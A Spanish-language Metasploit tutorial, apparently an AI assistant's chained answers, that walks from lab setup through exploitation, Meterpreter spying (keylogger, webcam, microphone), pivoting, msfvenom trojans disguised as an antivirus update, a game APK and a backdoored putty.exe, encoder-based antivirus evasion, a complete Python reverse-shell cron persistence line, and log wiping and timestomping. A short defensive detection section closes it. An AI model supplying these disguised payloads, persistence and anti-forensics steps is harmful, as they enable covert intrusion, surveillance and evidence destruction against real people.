Metasploit Framework en Kali Linux
Metasploit Framework en Kali Linux
Si estás usando Kali Linux, ya tienes en tus manos la herramienta más poderosa para pruebas de penetración: el Metasploit Framework (MSF).
Metasploit es una infraestructura que permite desarrollar, probar y ejecutar "exploits" contra una máquina remota. Esencialmente, es la navaja suiza de los hackers éticos.
1. Conceptos Básicos que debes conocer
Para no perderte en la terminal, estos son los términos clave:
Exploit: El "vehículo" o código que aprovecha un fallo de seguridad para entrar en un sistema.
Payload: Lo que quieres que suceda una vez que entras (por ejemplo, abrir una terminal remota o robar un archivo).
Meterpreter: Un tipo de payload avanzado que te da control total y dinámico sobre la víctima.
Module: Diferentes piezas de código (exploits, scanners, herramientas de post-explotación).
2. Cómo iniciar Metasploit en Kali
Antes de lanzarlo, es recomendable iniciar la base de datos para que las búsquedas sean mucho más rápidas:
Iniciar la base de datos:
sudo systemctl start postgresqlInicializar Metasploit DB:
sudo msfdb initLanzar la consola:
msfconsole
3. Comandos Esenciales (En Español)
Una vez dentro de msfconsole, estos son los comandos que más usarás:
| Comando | Descripción |
search [nombre] | Busca exploits o módulos (ej: search bluekeep). |
use [ruta] | Selecciona el módulo que vas a usar. |
show options | Muestra qué configuración necesita el exploit (IPs, puertos). |
set RHOSTS [IP] | Define la dirección IP de la víctima (Remote Host). |
set LHOST [IP] | Define tu propia dirección IP (Local Host) para recibir la conexión. |
exploit o run | Inicia el ataque o el escaneo. |
4. El flujo de trabajo típico
Escaneo: Identificas una vulnerabilidad en la víctima (usando Nmap, por ejemplo).
Búsqueda: Buscas un exploit adecuado en Metasploit.
Configuración: Defines la IP del objetivo y el payload.
Ejecución: Lanzas el ataque y esperas a obtener la sesión.
Nota de seguridad: Recuerda que usar estas herramientas contra sistemas sin autorización es ilegal. Úsalas siempre en entornos controlados, laboratorios propios (como máquinas de TryHackMe o HackTheBox) o bajo contratos de auditoría legal.
La mejor forma de aprender es ensuciándose las manos en un entorno seguro. No hay nada como ver tu primera sesión de Meterpreter abierta con éxito.
Para empezar, no necesitas hardware potente, solo un poco de espacio en disco. Aquí tienes la hoja de ruta para montar tu laboratorio:
1. El Objetivo: Metasploitable 2
En lugar de intentar atacar un sistema moderno (que es muy frustrante para empezar), usaremos Metasploitable 2. Es una máquina Linux diseñada intencionalmente para ser vulnerable a casi todo.
Descarga: Puedes encontrarla en SourceForge.
Instalación: Es un archivo
.zipque contiene un disco virtual (.vmdk). Solo tienes que crear una nueva máquina en VirtualBox o VMware y seleccionar ese disco existente.
2. Configuración de Red (¡Crucial!)
Para que tu Kali Linux "vea" a la máquina Metasploitable sin exponer tu red real al peligro, configura ambas máquinas virtuales así:
Ve a la configuración de la VM en VirtualBox/VMware.
En el apartado de Red, selecciona "Red Interna" o "Adaptador Puente" (si estás en una red doméstica segura).
Importante: Asegúrate de que ambas estén en la misma red.
3. Tu Primera "Misión"
Una vez que ambas máquinas estén encendidas, aquí tienes los pasos para tu primer ataque real:
Paso A: Identificación
En la terminal de Kali, averigua la IP de tu objetivo:
fping -asg 192.168.1.0/24 (o el rango que estés usando).
Paso B: El Ataque (Backdoor en FTP)
Metasploitable 2 tiene un servicio de FTP (vsftpd) con una "puerta trasera". Vamos a explotarlo:
Abre Metasploit:
msfconsoleBusca el exploit:
search vsftpdSelecciona el módulo:
use exploit/unix/ftp/vsftpd_234_backdoorConfigura la IP de la víctima:
set RHOSTS [IP_DE_METASPLOITABLE]¡Fuego!: Escribe
exploit
Resultado esperado: Si todo sale bien, verás una línea que dice
Command shell session 1 opened. ¡Ya estás dentro! Prueba escribiendowhoamiohostname.
Una vez que has logrado entrar en un sistema (lo que llamamos explotación), el verdadero trabajo comienza. La post-explotación consiste en explorar el sistema, elevar tus privilegios y extraer información valiosa.
Aquí tienes una guía rápida de qué hacer una vez que tienes una sesión abierta (especialmente si es una sesión de Meterpreter, que es la joya de la corona de Metasploit).
1. Comandos de Reconocimiento Inicial
Lo primero es saber "dónde" estás parado y "quién" eres en ese sistema.
getuid: Te dice con qué usuario estás trabajando.sysinfo: Muestra información del sistema operativo y la arquitectura (x86, x64).pwd/ls: Para ver en qué carpeta estás y qué archivos hay.ipconfig/ifconfig: Para ver si la máquina está conectada a otras redes internas (pivoteo).
2. Elevación de Privilegios
Si no eres el usuario administrador (root en Linux o SYSTEM en Windows), necesitas más poder.
getsystem: (Solo Windows) Metasploit intenta varios trucos automáticos para darte privilegios máximos.shell: Te da una terminal estándar del sistema operativo.Sugerencia: Si estás en una terminal normal de Linux, prueba escribir
sudo -lpara ver qué comandos puedes ejecutar como root sin contraseña.
3. Extracción de Información (Saqueo)
Aquí es donde obtienes los "trofeos".
hashdump: Intenta volcar los hashes de las contraseñas de los usuarios del sistema.search -f *.conf: Busca archivos de configuración que puedan tener contraseñas en texto plano.download [archivo]: Descarga un archivo de la víctima a tu máquina Kali.upload [archivo]: Sube tus herramientas de Kali a la máquina víctima.
4. Espionaje y Persistencia
Para asegurar que no pierdas el acceso si el usuario reinicia la máquina o para ver qué está haciendo en tiempo real:
| Acción | Comando |
| Captura de pantalla | screenshot |
| Ver por la webcam | webcam_stream |
| Grabar audio | record_mic -d 10 (graba 10 segundos) |
| Keylogger | keyscan_start (empieza a grabar teclas) y keyscan_dump (las muestra). |
Un truco extra: "Limpiar la casa"
Cuando termines tus pruebas, es una buena práctica borrar tus huellas (en entornos de auditoría). El comando clearev borra los registros de eventos en sistemas Windows, aunque en una auditoría real, siempre debes informar de lo que has tocado.
El Pivoting es una de las técnicas más espectaculares en el hacking ético. Imagina que has hackeado un servidor web que tiene dos tarjetas de red: una que mira a Internet (donde estás tú) y otra que se conecta a una red interna privada (donde están las bases de datos y archivos sensibles).
Como tú no tienes acceso directo a esa red interna, usas el servidor comprometido como un "puente" o "salto".
1. El escenario de Pivoting
Atacante (Tú): En la red externa.
Máquina Pivot (Comprometida): Tiene acceso a la red externa e interna.
Objetivo Interno: Solo visible para la máquina Pivot.
2. Pasos para hacer Pivoting con Metasploit
Una vez que tienes tu sesión de Meterpreter en la primera máquina, sigue estos pasos:
Paso A: Ver las redes internas
Dentro de Meterpreter, escribe:
run get_local_subnets
Esto te dirá qué otras redes "ve" la máquina que acabas de hackear. Supongamos que descubre la red 10.0.0.0/24.
Paso B: Crear la ruta (Autoroute)
Debes decirle a Metasploit que todo el tráfico dirigido a esa red interna pase a través de tu sesión actual:
Pon la sesión en segundo plano:
backgroundUsa el módulo de rutas:
use multi/manage/autorouteConfigura la sesión:
set SESSION 1(o el número que sea)Ejecuta:
run
Paso C: El Escaneo Indirecto
Ahora, cualquier módulo de Metasploit que lances (como un escáner de puertos) podrá "saltar" a la red interna:
use auxiliary/scanner/portscan/tcp
set RHOSTS 10.0.0.5 (la IP de la base de datos interna)
run
3. El siguiente nivel: Port Forwarding
Si quieres usar herramientas externas a Metasploit (como un navegador web o Nmap desde tu terminal) para atacar la red interna, necesitas "traer" el puerto de la víctima a tu propia máquina:
Desde Meterpreter:
portfwd add -l 8080 -p 80 -r 10.0.0.5
-l 8080: Es el puerto en tu Kali.
-p 80: Es el puerto en el objetivo interno.
-r 10.0.0.5: Es la IP del objetivo interno.
Resultado: Ahora, si abres el navegador en tu Kali y vas a
localhost:8080, ¡estarás viendo la web interna de la empresa que está escondida tras el servidor!
Aquí tienes una guía maestra resumida con todo lo que hemos cubierto. Puedes copiar este texto y guardarlo como guia_metasploit.md en tu Kali Linux para tenerlo siempre a mano.
🛡️ Guía Maestra: Metasploit Framework (Cheat Sheet)
1. Preparación del Entorno
Antes de lanzar la consola, prepara la base de datos para búsquedas instantáneas.
Iniciar DB:
sudo systemctl start postgresqlInicializar MSF:
sudo msfdb initLanzar:
msfconsoleEstado de DB:
db_status(dentro de msfconsole)
2. Comandos de Navegación
search [nombre]- Busca módulos (ej.search eternalblue).use [ruta]- Selecciona el módulo.info- Muestra detalles, autor y referencias del exploit.show options- Lista los parámetros necesarios.set [variable] [valor]- Configura parámetros (ej.set RHOSTS 192.168.1.50).set payload [ruta]- Elige qué hará el exploit al entrar.exploitorun- Ejecuta la acción.back- Sale del módulo actual.
3. Post-Explotación (Meterpreter)
Una vez que tengas la sesión abierta, estos comandos son tus mejores aliados:
| Categoría | Comando | Descripción |
| Sistema | getuid | Quién eres en el sistema. |
sysinfo | Datos del SO y arquitectura. | |
hashdump | Vuelca hashes de contraseñas. | |
shell | Abre una terminal del sistema (cmd o bash). | |
| Espionaje | screenshot | Captura la pantalla actual. |
keyscan_start | Inicia el registro de teclas. | |
keyscan_dump | Muestra las teclas capturadas. | |
| Archivos | upload [local] [remoto] | Sube un archivo a la víctima. |
download [remoto] [local] | Descarga un archivo de la víctima. |
4. Técnicas de Pivoting (Salto de Red)
Para atacar máquinas que no ves directamente:
Identificar red:
run get_local_subnets(dentro de Meterpreter).Poner en segundo plano:
background.Ruta automática:
use multi/manage/autorouteset SESSION [ID]run
Túnel de puerto (Port Forward):
portfwd add -l 8080 -p 80 -r [IP_INTERNA]Ahora accede desde tu navegador en Kali a
localhost:8080.
5. Gestión de Sesiones
sessions- Lista todas las conexiones activas.sessions -i [ID]- Interactúa con una sesión específica.sessions -k [ID]- Mata o cierra una sesión.
Consejo Pro: Si una sesión de Meterpreter se siente "lenta", puedes intentar migrar el proceso a uno más estable (como
explorer.exeen Windows) usando el comandomigrate [PID].
Aquí es donde la cosa se pone interesante. msfvenom es la herramienta de Metasploit que se encarga de fabricar el "veneno" (el payload). Es una combinación de msfpayload y msfencode.
Con ella puedes crear archivos ejecutables (.exe), aplicaciones de Android (.apk), scripts en Python, PHP y mucho más.
1. La anatomía de un comando msfvenom
Para crear un payload básico, siempre necesitas estos elementos:
-p: El payload que vas a usar (ej.
windows/meterpreter/reverse_tcp).LHOST: Tu dirección IP (donde la víctima se conectará de vuelta).
LPORT: El puerto que dejarás escuchando en tu Kali (ej.
4444).-f: El formato del archivo (exe, apk, elf, raw).
-o: El nombre del archivo de salida.
2. Creando un ejecutable para Windows (.exe)
Si quieres probarlo en una máquina de laboratorio con Windows, corre esto en tu terminal de Kali:
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=[TU_IP_KALI] LPORT=4444 -f exe -o antivirus_update.exe
Dato importante: Hoy en día, Windows Defender detectará este archivo al instante. Para entornos reales de auditoría, se usan técnicas de "evasión" (encoders o cryptors), pero para aprender en tu laboratorio, desactiva el antivirus de la máquina víctima.
3. El paso que todos olvidan: El "Handler"
Crear el archivo es solo la mitad del trabajo. Ahora necesitas que tu Kali esté escuchando y esperando a que la víctima abra el archivo.
En Metasploit, usa el "manejador" universal:
use exploit/multi/handlerConfigura el mismo payload que pusiste en el veneno:
set payload windows/x64/meterpreter/reverse_tcpConfigura tu IP y puerto:
set LHOST [TU_IP_KALI]set LPORT 4444Escribe
runoexploit.
4. Otros formatos comunes
Para Android:
msfvenom -p android/meterpreter/reverse_tcp LHOST=[IP] LPORT=4444 -o juego.apkPara Linux (Script de Python):
msfvenom -p cmd/unix/reverse_python LHOST=[IP] LPORT=4444 -f raw -o shell.py
Aquí entramos en el juego del gato y el ratón. Los antivirus (AV) utilizan algo llamado firmas para detectar malware. Si el código de tu payload coincide con una firma conocida, el AV lo bloqueará al instante.
Los encoders (codificadores) sirven para cambiar la apariencia del código del payload sin alterar su función, intentando así "romper" esa firma.
1. El Clásico: Shikata Ga Nai
El encoder más famoso de Metasploit es x86/shikata_ga_nai. Es un codificador polimórfico aditivo de base 2, lo que significa que cada vez que lo usas, el resultado es ligeramente distinto.
Cómo aplicarlo con msfvenom:
Añadimos la bandera -e (encoder) y -i (iteraciones, o cuántas veces queremos que se codifique):
msfvenom -p windows/meterpreter/reverse_tcp LHOST=[TU_IP] LPORT=4444 -e x86/shikata_ga_nai -i 10 -f exe -o update_codificado.exe
-e x86/shikata_ga_nai: El nombre del encoder.
-i 10: Le pedimos que codifique el archivo 10 veces seguidas para hacerlo más complejo.
2. Inyección en Archivos Reales (Template)
Una técnica mucho más efectiva que crear un .exe desde cero es "inyectar" tu código maligno dentro de un programa legítimo (como el instalador de un reproductor de música o una calculadora).
Usa la bandera -x (template):
msfvenom -p windows/meterpreter/reverse_tcp LHOST=[IP] LPORT=4444 -x putty.exe -k -f exe -o putty_hack.exe
-x putty.exe: Toma un ejecutable real como base.
-k: (Keep) Permite que el programa original siga funcionando normalmente mientras tu payload corre en segundo plano. ¡Así la víctima no sospecha nada!
3. ¿Realmente funcionan los Encoders hoy?
Siendo 100% sincero contigo: Los antivirus modernos (como Windows Defender o CrowdStrike) detectan los encoders clásicos de Metasploit casi siempre. Esto se debe a que los AV ya no solo miran el archivo, sino que analizan su comportamiento en memoria. Para saltar protecciones modernas, los profesionales usan:
Obfuscadores externos: Como Garble (para Go) o PyArmor (para Python).
Cargadores (Loaders) personalizados: Código propio que descarga el payload directamente en la memoria RAM (Fileless malware).
La Persistencia es el arte de quedarse dentro del sistema. Sin ella, si el usuario apaga su computadora o se desconecta de internet, pierdes tu sesión de Meterpreter y tendrías que volver a enviar el malware (lo cual es muy arriesgado).
En el mundo del hacking ético, queremos que nuestra "puerta trasera" se abra sola cada vez que la víctima inicie sesión.
1. Persistencia en Windows (Vía Registro)
La forma más clásica en Windows es usar las llaves de registro Run o RunOnce. Estas llaves le dicen al sistema: "Ejecuta este programa cada vez que el usuario entre".
Pasos en Metasploit:
Si ya tienes una sesión de Meterpreter, puedes usar un módulo automático:
Pon la sesión en segundo plano:
backgroundBusca el módulo:
use exploit/windows/local/persistenceConfigura la sesión:
set SESSION 1Configura el intervalo:
set DELAY 60(intenta conectar cada 60 segundos si falla).Ejecuta:
run
2. Persistencia en Linux (Vía Cronjobs)
En Linux, la persistencia se suele lograr mediante Cron, que es el planificador de tareas del sistema. Podemos programar que una "Reverse Shell" se ejecute cada 5 minutos.
Comando manual (dentro de la shell de la víctima):
(crontab -l ; echo "*/5 * * * * /usr/bin/python3 -c 'import socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"[TU_IP]\",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn(\"/bin/bash\")'") | crontab -
Esto creará una conexión hacia ti cada 5 minutos exactos.
3. Servicios del Sistema (El método más robusto)
Tanto en Windows como en Linux, puedes crear un Servicio. Los servicios corren incluso antes de que el usuario inicie sesión y con privilegios de Administrador/Root.
Windows: El módulo
exploit/windows/local/persistence_servicecrea un servicio que lanza tu payload al arrancar el PC.Linux: Puedes crear un archivo en
/etc/systemd/system/backdoor.serviceque ejecute tu script de Meterpreter.
4. Resumen de Técnicas de Persistencia
| Método | Dificultad | Detección (AV) | Notas |
| Registro (Run) | Baja | Alta | Muy fácil de ver en el Administrador de Tareas. |
| Tareas Programadas | Media | Media | Se esconde mejor en la lista de tareas del sistema. |
| Servicios | Alta | Baja | Difícil de eliminar y suele correr como SYSTEM/Root. |
| DLL Hijacking | Muy Alta | Muy Baja | Reemplazas una librería real por una falsa con tu código. |
Entramos en la fase final del ciclo de un ataque: Anti-forense o Limpieza de Huellas. En una auditoría real, esto es vital para probar si el equipo de seguridad (Blue Team) es capaz de detectar que alguien estuvo allí, incluso si el atacante intentó esconderse.
El objetivo es no dejar rastro en los archivos de sistema, registros de eventos o auditorías de red.
1. Borrado de Registros en Windows (Event Logs)
Windows registra casi todo: inicios de sesión, ejecución de procesos, cambios de privilegios, etc. Estos se guardan en el Visor de Eventos.
Si tienes una sesión de Meterpreter, hay un comando "mágico" que borra los tres registros principales (Aplicación, Sistema y Seguridad):
Comando:
clearev
Ojo: Borrar todos los logs de golpe es muy sospechoso para un administrador atento. Un profesional preferiría editar o borrar solo las líneas donde aparece su IP, pero
cleareves el estándar rápido en laboratorios.
2. Limpieza en Linux (Bash History)
En Linux, casi todo lo que escribes en la terminal se guarda en un archivo llamado .bash_history. Si un administrador escribe history, verá todos tus comandos.
Técnicas para Linux:
Desactivar el historial antes de empezar:
unset HISTFILEoexport HISTSIZE=0Borrar el historial al salir:
history -c && history -wBorrar logs del sistema:
Los archivos en
/var/log/(comoauth.log,syslog,wtmp) guardan quién se conectó y desde dónde. Los atacantes suelen vaciarlos:echo "" > /var/log/auth.log
3. Timestomping (Manipulación de Fechas)
Los forenses buscan archivos "nuevos" o modificados recientemente. El Timestomping consiste en cambiar las fechas de creación, acceso y modificación de tu malware para que parezca que fue instalado hace 5 años con el sistema operativo.
En Meterpreter, puedes usar el módulo timestomp:
Ver fechas:
timestomp archivo.exe -vCopiar fechas de un archivo legítimo (ej. kernel32.dll) al tuyo:
timestomp malicioso.exe -f C:\\Windows\\System32\\kernel32.dll
4. Archivos "Invisibles" (ADS en Windows)
En sistemas de archivos NTFS (Windows), existe algo llamado Alternate Data Streams. Permite "esconder" un archivo dentro de otro.
Puedes esconder tu
payload.exedentro de un simpletexto.txt.El usuario solo ve un archivo de texto de 1 KB, pero el malware está "detrás", invisible para el explorador de archivos.
Resumen del Flujo de un Pentest
Ahora que conoces todas las fases, este es el resumen de lo que has aprendido:
Reconocimiento: Nmap / Escaneo de puertos.
Explotación: MSFConsole / Buscar y lanzar el exploit.
Post-Explotación: Meterpreter / Sacar info y escalar privilegios.
Pivoting: Saltar a otras redes internas.
Persistencia: Asegurar el acceso tras reinicios.
Limpieza: Borrar logs y ocultar rastros.
Convertirse en un buen "atacker" (Red Team) es solo la mitad del camino; entender cómo defenderse (Blue Team) es lo que te convierte en un experto en ciberseguridad.
Detectar a alguien usando Metasploit es posible porque, aunque es potente, Metasploit suele ser bastante "ruidoso" si no se configura con extremo cuidado. Aquí te explico cómo detectar estas tácticas:
1. Detección de Escaneos (Nmap/Metasploit)
Antes del ataque, siempre hay ruido. Puedes usar un IDS (Sistema de Detección de Intrusos) como Snort o Suricata.
Cómo detectarlo: Un escaneo de puertos lanza miles de paquetes en segundos. Un IDS alertará sobre un "Portscan detectado" desde una IP específica.
Defensa activa: Configurar el Firewall (
iptablesoufw) para bloquear IPs que realicen más de X conexiones por minuto.
2. Detectando el "Veneno" (Análisis de Payloads)
Los archivos generados por msfvenom tienen firmas muy conocidas.
Firmas Estáticas: Los antivirus comparan el "hash" (el ADN del archivo). Si usas un payload básico sin modificar, cualquier antivirus gratuito lo borrará.
Análisis Heurístico/Comportamiento: Los EDR modernos (como CrowdStrike o SentinelOne) no miran el archivo, miran qué hace.
Alerta: "El proceso
word.exeacaba de lanzar una terminalcmd.exey está intentando conectarse a una IP externa". ¡PUM! Bloqueado.
3. Cazar al Meterpreter en la Red
Meterpreter mantiene una conexión constante (el "heartbeat").
Análisis de Tráfico: Si usas una herramienta como Wireshark, verás un flujo constante de paquetes hacia un puerto sospechoso (como el 4444).
TLS/SSL: Los atacantes avanzados cifran su tráfico, pero incluso así, el Blue Team puede detectar certificados SSL falsos o sospechosos que Metasploit genera por defecto.
4. Auditoría de Logs (SIEM)
Aquí es donde la "Limpieza de Huellas" falla. Las empresas usan un SIEM (como Splunk o Elasticsearch).
Si un atacante usa
clearev, el SIEM generará una alerta roja: "El registro de eventos de seguridad ha sido borrado por el usuario Administrador".Irónicamente, intentar borrar las huellas a veces es la pista más obvia de que hubo una intrusión.
5. Protegiendo tu Kali o Servidores
Si quieres "blindar" un sistema contra las técnicas que vimos:
Principio de Menor Privilegio: No uses el usuario
rootpara tareas diarias. Si te hackean, el atacante tendrá menos poder.EDR / Antivirus: Incluso en Linux, usa herramientas como ClamAV o Lynis para auditar la seguridad.
Monitoreo de Integridad (FIM): Herramientas como AIDE o Tripwire te avisan si un archivo importante (como el registro de Windows o
/etc/passwd) ha sido modificado.
Tu Kit de herramientas "Blue Team" para investigar:
| Herramienta | Función |
| Wireshark | Analizar el tráfico de red en busca de shells reversas. |
| Autopsy | Análisis forense de discos para encontrar archivos borrados o ADS. |
| Sysmon | (Windows) Registra cada ejecución de proceso y conexión de red con detalle quirúrgico. |
| Zeek | Analiza el tráfico de red y extrae metadatos para buscar anomalías. |
Has recorrido todo el ciclo de vida de una prueba de penetración. Para que no te quedes solo con Metasploit y sigas creciendo como profesional de la ciberseguridad, aquí tienes tu Hoja de Ruta (Roadmap) sugerida:
🗺️ Hoja de Ruta: De Principiante a Pentester Profesional
Fase 1: Fundamentos Sólidos (Lo que sostiene al hacker)
Antes de lanzar exploits, debes entender qué estás rompiendo.
Redes: Protocolos TCP/IP, el modelo OSI, DNS, HTTP/S y cómo funcionan las subredes.
Linux/Windows: Dominar la línea de comandos (Bash y PowerShell).
Scripting: Aprende Python o Go. Te servirá para automatizar tareas y modificar exploits existentes.
Fase 2: Especialización en Herramientas (Más allá de Metasploit)
Metasploit es genial, pero un profesional no depende de una sola herramienta.
Nmap: Aprende scripts avanzados (
NSE) para detección de vulnerabilidades.Burp Suite: La herramienta número 1 para auditoría de aplicaciones web (Hacking de páginas).
Wireshark: Para analizar tráfico y entender qué pasa "bajo el capó" durante un exploit.
John the Ripper / Hashcat: Para el cracking de contraseñas que obtengas con
hashdump.
Fase 3: Plataformas de Práctica (Laboratorios Reales)
No ataques sistemas sin permiso. Usa estos entornos legales y gratuitos/pagos:
TryHackMe: Ideal para principiantes. Tiene "rutas de aprendizaje" guiadas.
Hack The Box: Un poco más difícil, enfocado en máquinas reales que debes "romper".
VulnHub: Para descargar máquinas virtuales (como Metasploitable) y practicarlas offline.
Fase 4: Certificaciones (El papel que lo demuestra)
Si quieres trabajar en esto, estas son las certificaciones más valoradas:
EJPT (eLearnSecurity Junior Pentester): Perfecta para empezar, 100% práctica.
OSCP (Offensive Security Certified Professional): El "estándar de oro". Es un examen de 24 horas hackeando máquinas reales.
CEH (Certified Ethical Hacker): Más teórica, pero muy reconocida por empresas y gobiernos.
🏆 Resumen de tu Aprendizaje hoy
Hoy aprendiste:
Configuración: Cómo preparar Metasploit en Kali.
Explotación: El uso de módulos y payloads.
Post-Explotación: Qué hacer una vez que estás dentro (Meterpreter).
Movimiento Lateral: Cómo hacer Pivoting entre redes.
Evasión: Creación de payloads con
msfvenomy encoders.Persistencia: Cómo no perder el acceso.
Defensa: Cómo detectar estos ataques desde el Blue Team.
Consejo final de IA: La ciberseguridad cambia cada semana. Lee blogs como BleepingComputer, The Hacker News o sigue a investigadores en X (Twitter) para estar al tanto de las nuevas vulnerabilidades (0-days).